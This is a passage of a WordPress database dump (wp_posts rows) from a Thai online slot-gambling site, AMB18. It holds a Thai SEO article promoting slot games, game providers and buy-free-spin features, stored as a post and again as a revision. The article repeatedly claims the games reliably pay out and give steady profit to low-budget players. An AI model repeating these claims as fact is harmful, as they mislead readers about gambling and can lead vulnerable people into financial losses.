data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><b>AMB18 ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</b> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:25:56','2026-02-26 19:25:56','',27,'https://amb18slot.com/?p=408',0,'revision','',0),(409,3,'2026-02-26 19:26:53','2026-02-26 19:26:53','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2026-02-26 19:26:53','2026-02-26 19:26:53','',7,'https://amb18slot.com/?p=409',0,'revision','',0),(410,3,'2026-02-26 19:28:03','2026-02-26 19:28:03','<a href=\"https://luca333auto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://luca333line.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2026-02-26 19:28:03','2026-02-26 19:28:03','',32,'https://amb18slot.com/?p=410',0,'revision','',0),(411,3,'2026-02-26 19:28:29','2026-02-26 19:28:29','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2026-02-26 19:28:29','2026-02-26 19:28:29','',7,'https://amb18slot.com/?p=411',0,'revision','',0),(412,3,'2026-03-03 19:32:23','2026-03-03 19:32:23','<!-- wp:image {\"id\":369,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-2025-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก หนัก 2025\" class=\"wp-image-369\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก หนัก 2025</strong> เว็บเกมคุณภาพระบบไว เกมแตกจริงอัปเดตใหม่กว่า 1,500 รายการ พร้อมฟีเจอร์ซื้อฟรีสปินและค่ายเกมดังครบทุกสไตล์ รับรองว่าเล่นง่ายและกำไรดีเพราะว่าการเข้าเล่นที่นี่คือแพลตฟอร์มเกมสล็อตออนไลน์ที่ตอบโจทย์สายทำกำไรยุคใหม่แบบครบสูตร ทั้งเรื่องความเสถียรของระบบ ความไวในการทำรายการ และคลังเกมที่อัปเดตต่อเนื่องแบบไม่ตกเทรนด์ จุดเด่นสำคัญคือการเป็นเว็บตรงไม่ผ่านเอเย่นต์ ทำให้การเล่นโปร่งใสตรวจสอบได้ และมีโอกาสรับอัตราการจ่ายที่คุ้มค่า ผู้เล่นสามารถเริ่มต้นด้วยงบสบายกระเป๋า พร้อมลุ้นรางวัลใหญ่ได้จริงทุกวัน บรรยากาศการเล่นลื่นไหล ไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์ ใครที่กำลังมองหาเว็บเกมสล็อตที่เน้นแตกจริง จ่ายจริง และสร้างกำไรได้ต่อเนื่องการเข้าเล่นกับทาง <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> ถือว่าเป็นตัวเลือกที่ไม่ควรมองข้าม</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก หนัก 2025 มาพร้อมระบบฝากถอนไว สล็อต แตก ง่าย ทุน น้อย วอ เลท</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>แน่นอนว่าการเข้าเล่นกับทางเว็บเรานั้นให้ความสำคัญกับประสบการณ์ผู้เล่นตั้งแต่วินาทีแรกที่สมัครสมาชิกระบบฝากถอนถูกพัฒนาให้รวดเร็วภายในไม่กี่วินาที รองรับการทำรายการผ่านธนาคารชั้นนำและวอลเลททำให้สายทุนน้อยสามารถบริหารงบได้คล่องตัว ไม่ต้องรอนานจนเสียจังหวะการปั่นเกมสล็อตแตกง่ายหลายเกมถูกออกแบบให้เหมาะกับงบเริ่มต้นหลักสิบถึงหลักร้อยเพิ่มโอกาสทำกำไรแบบค่อยเป็นค่อยไป ระบบอัตโนมัติทำงานตลอดยี่สิบสี่ชั่วโมงลดความผิดพลาด และช่วยให้การเงินปลอดภัยมากขึ้น ใครที่อยากได้เว็บที่ทั้งแตกง่ายและจัดการเงินไว <strong>สล็อต แตก ง่าย ทุน น้อย วอ เลท </strong>จึงตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตกหนัก 2025 เล่นสนุก อัปเดตเกมมากกว่า 1,500 รายการ ทุกเกม กำไรดี</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อตแตกหนัก 2025 </strong>มาพร้อมคลังเกมมากกว่าหนึ่งพันห้าร้อยรายการครอบคลุมทุกธีมตั้งแต่แฟนตาซี เทพเจ้า สัตว์นำโชค ไปจนถึงแนวผจญภัยสุดมัน ทุกเกมถูกคัดสรรจากผู้พัฒนาชั้นนำที่มีมาตรฐานสากล ภาพกราฟิกคมชัด ระบบเสียงเร้าใจ และฟีเจอร์พิเศษ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ช่วยเพิ่มโอกาสรับรางวัลไม่ว่าจะเป็นสัญลักษณ์ไวลด์ ตัวคูณ หรือรอบโบนัส เกมส่วนใหญ่มีค่า RTP อยู่ในระดับที่น่าสนใจ ช่วยให้ผู้เล่นมีโอกาสคืนทุนและสร้างกำไรดีได้ในระยะยาวการอัปเดตเกมใหม่เกิดขึ้นต่อเนื่อง ทำให้ไม่มีคำว่าเบื่อสำหรับสายปั่นที่ต้องการประสบการณ์สดใหม่ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตก หนัก 2025 บอกต่อเกมชื่อดัง แตกจริง ที่สายปั่นทุนน้อยต้องมาลอง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>รวมเกมยอดนิยมที่ได้รับกระแสตอบรับดีจากผู้เล่นทั่วเอเชีย โดยเฉพาะเกมที่เน้นตัวคูณสูงและโบนัสเข้าบ่อยเหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรแตกจริงแบบมีจังหวะ เกมเหล่านี้ถูกออกแบบให้เข้าใจง่าย ไม่ซับซ้อนมือใหม่ก็สามารถเรียนรู้ได้ภายในไม่กี่รอบ จุดเด่นคือการมีฟีเจอร์เสริมที่ช่วยเร่งการทำเงิน เช่น ฟรีสปินหรือการสุ่มรางวัลพิเศษ ใครที่อยากเริ่มต้นด้วยงบจำกัดแต่หวังผลกำไรชัดเจน <strong>สล็อตแตกหนัก 2025</strong> มีรายชื่อเกมที่ควรลองดังต่อไปนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Ganesha Fortune ธีมเทพเจ้านำโชคของอินเดีย พร้อมตัวคูณและโบนัสสปินฟรีที่น่าสนใจ</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Ganesha Fortune เป็นเกมสล็อตธีมเทพเจ้าที่โดดเด่นเรื่องบรรยากาศสีทองและสัญลักษณ์นำโชคแบบอินเดีย จุดขายสำคัญคือระบบตัวคูณที่สามารถเพิ่มมูลค่ารางวัลได้หลายเท่าเมื่อเข้าสู่รอบโบนัสสปินฟรี ผู้เล่นสามารถลุ้นสัญลักษณ์พิเศษที่กระตุ้นการหมุนซ้ำและเพิ่มโอกาสรับเงินรางวัลก้อนโต รูปแบบเกมเข้าใจง่าย เส้นไลน์ไม่ซับซ้อน เหมาะกับทั้งมือใหม่และสายเก๋า ค่าอัตราการคืนเงินอยู่ในระดับดี ทำให้หลายคนยกให้เป็นหนึ่งในเกมแตกบ่อยของแพลตฟอร์มนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Fortune Ox เกมธีมวัวนำโชคที่เล่นง่าย มีอัตราการคืนเงินดีและเหมาะกับผู้เล่นทุกระดับ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Fortune Ox เป็นเกมสล็อตธีมวัวนำโชคที่เน้นความเรียบง่ายแต่แฝงพลังทำกำไร สัญลักษณ์หลักคือวัวทองที่มาพร้อมรางวัลตัวคูณสูง ระบบการเล่นไม่ซับซ้อน เหมาะกับผู้เล่นทุกระดับ ตั้งแต่มือใหม่ที่เพิ่งเริ่มต้นจนถึงสายปั่นมืออาชีพ จุดเด่นคืออัตราการคืนเงินที่อยู่ในเกณฑ์น่าสนใจ และรอบโบนัสที่สามารถเกิดได้บ่อยเมื่อจัดการงบอย่างมีวินัย ใครที่มองหาเกมเล่นง่าย ลุ้นสนุก และมีโอกาสรับรางวัลต่อเนื่อง Fortune Ox คืออีกหนึ่งตัวเลือกที่ควรลอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Pinata Wins ธีมเทศกาลที่มีตัวคูณและโบนัสพินาต้า เพิ่มโอกาสทำกำไรได้แบบไม่ธรรมดา </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Pinata Wins มาในธีมเทศกาลสีสันสดใส ให้บรรยากาศสนุกและตื่นเต้นทุกครั้งที่หมุน วงล้อเต็มไปด้วยสัญลักษณ์ขนมและพินาต้าที่ซ่อนรางวัลพิเศษ ฟีเจอร์เด่นคือโบนัสพินาต้าที่สามารถสุ่มตัวคูณและรางวัลเงินสดแบบทันที เมื่อเข้าสู่รอบพิเศษผู้เล่นมีโอกาสรับตัวคูณสะสมที่เพิ่มมูลค่ารางวัลอย่างก้าวกระโดด เกมนี้เหมาะกับสายลุ้นที่ต้องการความเร้าใจและโอกาสทำกำไรในรอบสั้น ถือเป็นอีกเกมที่ได้รับความนิยมในหมวดเกมสล็อตแตกหนัก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก หนัก 2025 สุดยอดแหล่งเกมคุณภาพ เล่นง่าย มาพร้อมค่ายแห่งความปังแห่งปี </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สัมผัสความสนุกแบบจัดเต็มกับทาง <strong>เว็บ ตรง แตก หนัก 2025 </strong>ไม่ได้มีดีแค่จำนวนเกม แต่ยังรวมค่ายพัฒนาระดับสากลที่ขึ้นชื่อเรื่องคุณภาพและความเสถียรของระบบแต่ละค่ายมีเอกลักษณ์เฉพาะตัว ทั้งด้านกราฟิก ฟีเจอร์ และโครงสร้างการจ่ายรางวัล ผู้เล่นสามารถเลือกสไตล์ที่ตรงกับแนวทางการปั่นของตัวเองได้อย่างอิสระ ไม่ว่าจะชอบเกมภาพอลังการหรือเกมเรียบง่ายเน้นแตกบ่อยก็สามารถที่ะเข้าเล่นง่ายการรวมค่ายดังไว้ในที่เดียวช่วยให้ประสบการณ์เล่นครบเครื่องและเพิ่มโอกาสค้นพบเกมทำเงินใหม่ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เว็บตรงแตกหนัก 2025 ค่ายเกม RED TIGER</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RED TIGER เป็นค่ายเกมที่โดดเด่นด้านกราฟิกคุณภาพสูงและระบบแจ็คพอตที่น่าสนใจ เกมส่วนใหญ่มีฟีเจอร์เสริมหลากหลาย เช่น ตัวคูณแบบสุ่มและวงล้อโบนัสพิเศษ จุดแข็งคือความเสถียรและการออกแบบที่ทันสมัย ทำให้ผู้เล่นได้รับประสบการณ์ที่ลื่นไหลและตื่นเต้นในทุกการหมุน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม SPADGAMING</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>SPADGAMING เป็นค่ายที่ได้รับความนิยมในตลาดเอเชีย ด้วยธีมเกมที่เข้าถึงง่ายและเน้นสัญลักษณ์นำโชคแบบวัฒนธรรมตะวันออก หลายเกมมีอัตราการคืนเงินที่อยู่ในระดับดี เหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรต่อเนื่อง รูปแบบการเล่นไม่ซับซ้อน แต่มีฟีเจอร์โบนัสที่สร้างความตื่นเต้นได้ตลอดการปั่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม RVO PLAY</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RVO PLAY โดดเด่นเรื่องการออกแบบเกมที่ทันสมัยและมีลูกเล่นเฉพาะตัว หลายเกมมีระบบตัวคูณสะสมและรอบพิเศษที่เปิดโอกาสให้รับรางวัลก้อนใหญ่ เหมาะกับผู้เล่นที่ชอบความแปลกใหม่และต้องการประสบการณ์แตกต่างจากสล็อตทั่วไป</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บตรงแตกหนัก 2025 มาพร้อมฟรีสปิน แจกหนัก ด้วยการซื้อฟีเจอร์ Buy Free Spin </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ในการเลือกเล่นกับทาง <strong>เว็บตรงแตกหนัก 2025</strong> เพิ่มทางเลือกให้สายลุ้นด้วยฟีเจอร์ Buy Free Spin ที่เปิดโอกาสให้เข้าสู่รอบโบนัสได้ทันทีโดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไข ฟีเจอร์นี้เหมาะกับผู้เล่นที่ต้องการเร่งจังหวะทำกำไรและลดเวลาการสะสมสัญลักษณ์ การซื้อฟรีสปินช่วยให้เข้าถึงตัวคูณสูงและรางวัลพิเศษได้เร็วขึ้น อย่างไรก็ตามควรวางแผนงบประมาณอย่างรอบคอบเพื่อบริหารความเสี่ยง เมื่อใช้อย่างมีวินัย ฟีเจอร์นี้สามารถเป็นเครื่องมือสำคัญในการสร้างกำไรระยะสั้นและเพิ่มความตื่นเต้นให้ทุกการเล่นบนแพลตฟอร์มแห่งนี้ และถ้าคุณมีข้อมูลที่สงสัยเพิ่มเติมสามารถที่จะติดต่อสอบถามผ่านทาง <a href=\"http://luca333line.com\"><strong>ไลน์</strong></a> ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 เล่นง่าย แตกจริงแจกหนักกำไรดี','','publish','closed','closed','','slot-direct-website-2025','','','2026-03-02 08:30:46','2026-03-02 08:30:46','',0,'https://amb18slot.com/?p=412',0,'post','',0),(413,3,'2026-02-26 19:32:18','2026-02-26 19:32:18','<!-- wp:image {\"id\":369,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-2025-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก หนัก 2025\" class=\"wp-image-369\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก หนัก 2025</strong> เว็บเกมคุณภาพระบบไว เกมแตกจริงอัปเดตใหม่กว่า 1,500 รายการ พร้อมฟีเจอร์ซื้อฟรีสปินและค่ายเกมดังครบทุกสไตล์ รับรองว่าเล่นง่ายและกำไรดีเพราะว่าการเข้าเล่นที่นี่คือแพลตฟอร์มเกมสล็อตออนไลน์ที่ตอบโจทย์สายทำกำไรยุคใหม่แบบครบสูตร ทั้งเรื่องความเสถียรของระบบ ความไวในการทำรายการ และคลังเกมที่อัปเดตต่อเนื่องแบบไม่ตกเทรนด์ จุดเด่นสำคัญคือการเป็นเว็บตรงไม่ผ่านเอเย่นต์ ทำให้การเล่นโปร่งใสตรวจสอบได้ และมีโอกาสรับอัตราการจ่ายที่คุ้มค่า ผู้เล่นสามารถเริ่มต้นด้วยงบสบายกระเป๋า พร้อมลุ้นรางวัลใหญ่ได้จริงทุกวัน บรรยากาศการเล่นลื่นไหล ไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์ ใครที่กำลังมองหาเว็บเกมสล็อตที่เน้นแตกจริง จ่ายจริง และสร้างกำไรได้ต่อเนื่องการเข้าเล่นกับทาง <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> ถือว่าเป็นตัวเลือกที่ไม่ควรมองข้าม</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>มาพร้อมระบบฝากถอนไว สล็อต แตก ง่าย ทุน น้อย วอ เลท</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>แน่นอนว่าการเข้าเล่นกับทางเว็บเรานั้นให้ความสำคัญกับประสบการณ์ผู้เล่นตั้งแต่วินาทีแรกที่สมัครสมาชิกระบบฝากถอนถูกพัฒนาให้รวดเร็วภายในไม่กี่วินาที รองรับการทำรายการผ่านธนาคารชั้นนำและวอลเลททำให้สายทุนน้อยสามารถบริหารงบได้คล่องตัว ไม่ต้องรอนานจนเสียจังหวะการปั่นเกมสล็อตแตกง่ายหลายเกมถูกออกแบบให้เหมาะกับงบเริ่มต้นหลักสิบถึงหลักร้อยเพิ่มโอกาสทำกำไรแบบค่อยเป็นค่อยไป ระบบอัตโนมัติทำงานตลอดยี่สิบสี่ชั่วโมงลดความผิดพลาด และช่วยให้การเงินปลอดภัยมากขึ้น ใครที่อยากได้เว็บที่ทั้งแตกง่ายและจัดการเงินไว <strong>สล็อต แตก ง่าย ทุน น้อย วอ เลท </strong>จึงตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>เล่นสนุก อัปเดตเกมมากกว่า 1,500 รายการ ทุกเกม </strong><strong>กำไรดี</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong>มาพร้อมคลังเกมมากกว่าหนึ่งพันห้าร้อยรายการครอบคลุมทุกธีมตั้งแต่แฟนตาซี เทพเจ้า สัตว์นำโชค ไปจนถึงแนวผจญภัยสุดมัน ทุกเกมถูกคัดสรรจากผู้พัฒนาชั้นนำที่มีมาตรฐานสากล ภาพกราฟิกคมชัด ระบบเสียงเร้าใจ และฟีเจอร์พิเศษที่ช่วยเพิ่มโอกาสรับรางวัลไม่ว่าจะเป็นสัญลักษณ์ไวลด์ ตัวคูณ หรือรอบโบนัส เกมส่วนใหญ่มีค่า RTP อยู่ในระดับที่น่าสนใจ ช่วยให้ผู้เล่นมีโอกาสคืนทุนและสร้างกำไรดีได้ในระยะยาวการอัปเดตเกมใหม่เกิดขึ้นต่อเนื่อง ทำให้ไม่มีคำว่าเบื่อสำหรับสายปั่นที่ต้องการประสบการณ์สดใหม่ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>บอกต่อเกมชื่อดัง </strong><strong>แตกจริง </strong><strong>ที่สายปั่นทุนน้อยต้องมาลอง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>รวมเกมยอดนิยมที่ได้รับกระแสตอบรับดีจากผู้เล่นทั่วเอเชีย โดยเฉพาะเกมที่เน้นตัวคูณสูงและโบนัสเข้าบ่อยเหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรแตกจริงแบบมีจังหวะ เกมเหล่านี้ถูกออกแบบให้เข้าใจง่าย ไม่ซับซ้อนมือใหม่ก็สามารถเรียนรู้ได้ภายในไม่กี่รอบ จุดเด่นคือการมีฟีเจอร์เสริมที่ช่วยเร่งการทำเงิน เช่น ฟรีสปินหรือการสุ่มรางวัลพิเศษ ใครที่อยากเริ่มต้นด้วยงบจำกัดแต่หวังผลกำไรชัดเจน <strong>สล็อต เว็บ ตรง แตก หนัก 2025</strong> มีรายชื่อเกมที่ควรลองดังต่อไปนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Ganesha Fortune ธีมเทพเจ้านำโชคของอินเดีย พร้อมตัวคูณและโบนัสสปินฟรีที่น่าสนใจ</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Ganesha Fortune เป็นเกมสล็อตธีมเทพเจ้าที่โดดเด่นเรื่องบรรยากาศสีทองและสัญลักษณ์นำโชคแบบอินเดีย จุดขายสำคัญคือระบบตัวคูณที่สามารถเพิ่มมูลค่ารางวัลได้หลายเท่าเมื่อเข้าสู่รอบโบนัสสปินฟรี ผู้เล่นสามารถลุ้นสัญลักษณ์พิเศษที่กระตุ้นการหมุนซ้ำและเพิ่มโอกาสรับเงินรางวัลก้อนโต รูปแบบเกมเข้าใจง่าย เส้นไลน์ไม่ซับซ้อน เหมาะกับทั้งมือใหม่และสายเก๋า ค่าอัตราการคืนเงินอยู่ในระดับดี ทำให้หลายคนยกให้เป็นหนึ่งในเกมแตกบ่อยของแพลตฟอร์มนี้</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Fortune Ox เกมธีมวัวนำโชคที่เล่นง่าย มีอัตราการคืนเงินดีและเหมาะกับผู้เล่นทุกระดับ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Fortune Ox เป็นเกมสล็อตธีมวัวนำโชคที่เน้นความเรียบง่ายแต่แฝงพลังทำกำไร สัญลักษณ์หลักคือวัวทองที่มาพร้อมรางวัลตัวคูณสูง ระบบการเล่นไม่ซับซ้อน เหมาะกับผู้เล่นทุกระดับ ตั้งแต่มือใหม่ที่เพิ่งเริ่มต้นจนถึงสายปั่นมืออาชีพ จุดเด่นคืออัตราการคืนเงินที่อยู่ในเกณฑ์น่าสนใจ และรอบโบนัสที่สามารถเกิดได้บ่อยเมื่อจัดการงบอย่างมีวินัย ใครที่มองหาเกมเล่นง่าย ลุ้นสนุก และมีโอกาสรับรางวัลต่อเนื่อง Fortune Ox คืออีกหนึ่งตัวเลือกที่ควรลอง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Pinata Wins ธีมเทศกาลที่มีตัวคูณและโบนัสพินาต้า เพิ่มโอกาสทำกำไรได้แบบไม่ธรรมดา </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Pinata Wins มาในธีมเทศกาลสีสันสดใส ให้บรรยากาศสนุกและตื่นเต้นทุกครั้งที่หมุน วงล้อเต็มไปด้วยสัญลักษณ์ขนมและพินาต้าที่ซ่อนรางวัลพิเศษ ฟีเจอร์เด่นคือโบนัสพินาต้าที่สามารถสุ่มตัวคูณและรางวัลเงินสดแบบทันที เมื่อเข้าสู่รอบพิเศษผู้เล่นมีโอกาสรับตัวคูณสะสมที่เพิ่มมูลค่ารางวัลอย่างก้าวกระโดด เกมนี้เหมาะกับสายลุ้นที่ต้องการความเร้าใจและโอกาสทำกำไรในรอบสั้น ถือเป็นอีกเกมที่ได้รับความนิยมในหมวดเกมสล็อตแตกหนัก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>สุดยอดแหล่งเกมคุณภาพ </strong><strong>เล่นง่าย </strong><strong>มาพร้อมค่ายแห่งความปังแห่งปี </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สัมผัสความสนุกแบบจัดเต็มกับทาง <strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong>ไม่ได้มีดีแค่จำนวนเกม แต่ยังรวมค่ายพัฒนาระดับสากลที่ขึ้นชื่อเรื่องคุณภาพและความเสถียรของระบบแต่ละค่ายมีเอกลักษณ์เฉพาะตัว ทั้งด้านกราฟิก ฟีเจอร์ และโครงสร้างการจ่ายรางวัล ผู้เล่นสามารถเลือกสไตล์ที่ตรงกับแนวทางการปั่นของตัวเองได้อย่างอิสระ ไม่ว่าจะชอบเกมภาพอลังการหรือเกมเรียบง่ายเน้นแตกบ่อยก็สามารถที่ะเข้าเล่นง่ายการรวมค่ายดังไว้ในที่เดียวช่วยให้ประสบการณ์เล่นครบเครื่องและเพิ่มโอกาสค้นพบเกมทำเงินใหม่ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>ค่ายเกม RED TIGER</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RED TIGER เป็นค่ายเกมที่โดดเด่นด้านกราฟิกคุณภาพสูงและระบบแจ็คพอตที่น่าสนใจ เกมส่วนใหญ่มีฟีเจอร์เสริมหลากหลาย เช่น ตัวคูณแบบสุ่มและวงล้อโบนัสพิเศษ จุดแข็งคือความเสถียรและการออกแบบที่ทันสมัย ทำให้ผู้เล่นได้รับประสบการณ์ที่ลื่นไหลและตื่นเต้นในทุกการหมุน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม SPADGAMING</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>SPADGAMING เป็นค่ายที่ได้รับความนิยมในตลาดเอเชีย ด้วยธีมเกมที่เข้าถึงง่ายและเน้นสัญลักษณ์นำโชคแบบวัฒนธรรมตะวันออก หลายเกมมีอัตราการคืนเงินที่อยู่ในระดับดี เหมาะกับสายทุนน้อยที่ต้องการลุ้นกำไรต่อเนื่อง รูปแบบการเล่นไม่ซับซ้อน แต่มีฟีเจอร์โบนัสที่สร้างความตื่นเต้นได้ตลอดการปั่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่ายเกม RVO PLAY</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>RVO PLAY โดดเด่นเรื่องการออกแบบเกมที่ทันสมัยและมีลูกเล่นเฉพาะตัว หลายเกมมีระบบตัวคูณสะสมและรอบพิเศษที่เปิดโอกาสให้รับรางวัลก้อนใหญ่ เหมาะกับผู้เล่นที่ชอบความแปลกใหม่และต้องการประสบการณ์แตกต่างจากสล็อตทั่วไป</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก หนัก 2025 </strong><strong>มาพร้อมฟรีสปิน </strong><strong>แจกหนัก </strong><strong>ด้วยการซื้อฟีเจอร์ Buy Free Spin </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ในการเลือกเล่นกับทาง <strong>สล็อต เว็บ ตรง แตก หนัก 2025</strong> เพิ่มทางเลือกให้สายลุ้นด้วยฟีเจอร์ Buy Free Spin ที่เปิดโอกาสให้เข้าสู่รอบโบนัสได้ทันทีโดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไข ฟีเจอร์นี้เหมาะกับผู้เล่นที่ต้องการเร่งจังหวะทำกำไรและลดเวลาการสะสมสัญลักษณ์ การซื้อฟรีสปินช่วยให้เข้าถึงตัวคูณสูงและรางวัลพิเศษได้เร็วขึ้น อย่างไรก็ตามควรวางแผนงบประมาณอย่างรอบคอบเพื่อบริหารความเสี่ยง เมื่อใช้อย่างมีวินัย ฟีเจอร์นี้สามารถเป็นเครื่องมือสำคัญในการสร้างกำไรระยะสั้นและเพิ่มความตื่นเต้นให้ทุกการเล่นบนแพลตฟอร์มแห่งนี้ และถ้าคุณมีข้อมูลที่สงสัยเพิ่มเติมสามารถที่จะติดต่อสอบถามผ่านทาง <a href=\"http://luca333line.com\"><strong>ไลน์</strong></a> ได้ตลอดเวลา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 เล่นง่าย แตกจริงแจกหนักกำไรดี','','inherit','closed','closed','','412-revision-v1','','','2026-02-26 19:32:18','2026-02-26 19:32:18','',412,'https://amb18slot.com/?p=413',0,'revision','',0),(414,3,'2026-03-02 08:29:41','2026-03-02 08:29:41','<!-- wp:image {\"id\":370,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-goodweb-bonus-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก ง่าย ล่าสุด\" class=\"wp-image-370\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ 